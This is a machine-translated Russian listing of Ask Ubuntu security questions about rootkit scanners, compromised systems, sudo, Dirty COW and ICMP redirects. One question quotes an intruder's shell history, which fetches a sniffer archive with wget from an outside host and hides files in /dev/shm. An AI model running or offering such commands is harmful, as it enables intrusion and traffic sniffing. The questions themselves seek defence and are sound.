Вопросы с тегом «security»

25
rkhunter предупреждение о /etc/.java /etc/.udev /etc/.initramfs

Я использую Ubuntu 10.04.1 LTS. Я запускаю rkhunter для проверки руткитов. rkhunter жалуется на следующие скрытые файлы и каталоги. Я думаю, что эти файлы не являются реальной проблемой в моей системе, но как я могу проверить, являются ли эти файлы допустимыми? [07:57:45] Checking for hidden files...

25
chkrootkit показывает «tcpd» как зараженный. Это ложный положительный результат?

Сканирование с помощью chkrootkit показывает "tcpd" как зараженный. Хотя сканирование rkhunter показывает нормально, (за исключением обычных ложных срабатываний) Должен ли я волноваться? (Я на Ubuntu 16.10 с...

25
Как я могу подтвердить, что двоичные файлы в моем Ubuntu взяты из исходного кода, из которого они должны быть?

Как и 99% пользователей, я устанавливаю Ubuntu из готовых двоичных файлов. Как я могу убедиться, что эти двоичные файлы на самом деле взяты из исходного исходного кода Ubuntu? Было бы хорошо проверить, что АНБ / кто-то еще не сотрудничал ни с Ubuntu, ни с Linode (моим провайдером VPS), чтобы...

25
Насколько важен пароль sudo?

Я знаю, что пароль sudo защищает мой компьютер от локального взлома кем-то, имеющим физический доступ к нему ( правка: на самом деле это не так ). Мой пароль достаточно силен для этой цели, но я знаю, что он недостаточно силен, если кто-то может его переборить. Кто- нибудь может получить доступ к...

25
Персональный компьютер взломан: как заблокировать этому пользователю повторный вход в систему? Как мне узнать, как они входят в систему?

Я на 99,9% уверен, что моя система на моем персональном компьютере была заражена. Позвольте мне сначала высказать свое мнение, чтобы ситуация была ясна: Грубые сроки подозрительной активности и предпринятых последующих действий: 4-26 23:00 Я закончил все программы и закрыл свой ноутбук. 4-27 12:00...

24
Как система защищена?

Я понимаю, что если какая-либо вредоносная программа проникнет в систему Linux, она, в лучшем случае, получит привилегию на уровне пользователя и разрушит все, что находится в пределах досягаемости конкретного пользователя, то есть собственные файлы пользователя. Но что именно мешает вредоносным...

24
Нашел SSH Backdoor на VServer. Что делать?

Вчера я проверил свою историю команд на моем VServer. Я нашел несколько подозрительных строк. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget...

24
Безопасно ли обновление мета-релиза (do-release-upgrade)?

Я пытаюсь понять do-release-upgradeпроцесс, то есть способ, которым Ubuntu побуждает меня перейти к следующей версии Ubuntu весной или осенью. После прочтения исходных текстов ubuntu-release-upgraderя обнаружил файл / etc / update-manager / meta-release в моей системе. Этот файл использует...

23
Если я следую инструкциям из блога или спрашиваю Ubuntu и т. Д., Всегда ли это безопасно?

Я новичок в Linux и Ubuntu. Когда я не знаю, как что-то сделать с этой ОС, я ищу в Интернете и спрашиваю Ubuntu и всегда нахожу ответ. Но иногда это не отличный ответ и не полный урок. Я все равно следую инструкциям, но я не знаю, что означают все команды. Итак, мой вопрос: Когда я следую учебному...

23
Где я могу найти вредоносные программы, которые могли быть установлены на моем компьютере?

Я хочу проанализировать мой ящик с Ubuntu, чтобы определить, был ли он взломан. У меня вопрос: где искать, где запускается какое-либо вредоносное ПО? Ниже приведен какой-то необработанный список: MBR образ ядра (у меня md5) / sbin / init (у меня есть md5) Модули ядра в / etc / modules все сценарии...

23
Почему я должен доверять диалогу «Обнаружена проблема с системной программой»?

Это всегда проявляется через несколько минут после входа в систему: Я понятия не имею, что это такое. Если я нажимаю Сообщить о проблеме , он запрашивает мой пароль: Это именно то, что я бы сделал, если бы я хотел украсть чей-то пароль. Почему я должен доверять этому, и что он собирается делать...

23
Как я могу определить, кто-то крадет мою широкополосную пропускную способность?

Я очень параноидален по поводу беспроводных соединений и того, что кто-то крадет мою широкополосную пропускную способность, что может привести к худшим последствиям. У меня вопрос, как я могу определить, что моя широкополосная полоса пропускания украдена? У меня есть беспроводной маршрутизатор...

22
Как должен быть защищен сервер? [закрыто]

Закрыто . Этот вопрос должен быть более сфокусированным . В настоящее время не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он был сосредоточен только на одной проблеме, отредактировав этот пост . Закрыто 4 года назад . Говоря о Ubuntu 10.04, выпуск сервера, какие...

22
Является ли Ubuntu уязвимым для недавних эксплойтов, использующих флешки и автомонтирование?

Недавно я читал, что кто-то продемонстрировал атаку безопасности на ПК с помощью автомонтирования и USB-накопителя. Насколько я уязвим к этой атаке и какие шаги предпринимают разработчики, чтобы быть активными против такого рода...

22
Риски / недостатки, связанные с вином

Может ли Wine в целом или приложения windows, установленные через wine, представлять некоторый риск для установки Ubuntu? Этот вопрос возник у меня в голове, когда я прочитал ответ на мой предыдущий вопрос Доступ к сайтам только в IE : Попробуйте установить PlayonLinux с playonlinux.org и...

22
Что такое ошибка «Dirty COW» и как я могу защитить свою систему от нее?

Я только что слышал об этой ошибке "Dirty COW", которая позволяет любому пользователю, имеющему доступ для чтения к файлам, также писать в них и получать административный доступ. Как мне защититься от этой...

22
Что такое перенаправления ICMP и должны ли они быть заблокированы?

После включения UFW и аудитора безопасности Tiger, я вижу предупреждения, говорящие: The system accepts ICMP redirection messages Что такое сообщения перенаправления ICMP? Должны ли они быть отключены в целях безопасности? Если да, то как правильно сделать это с помощью брандмауэра...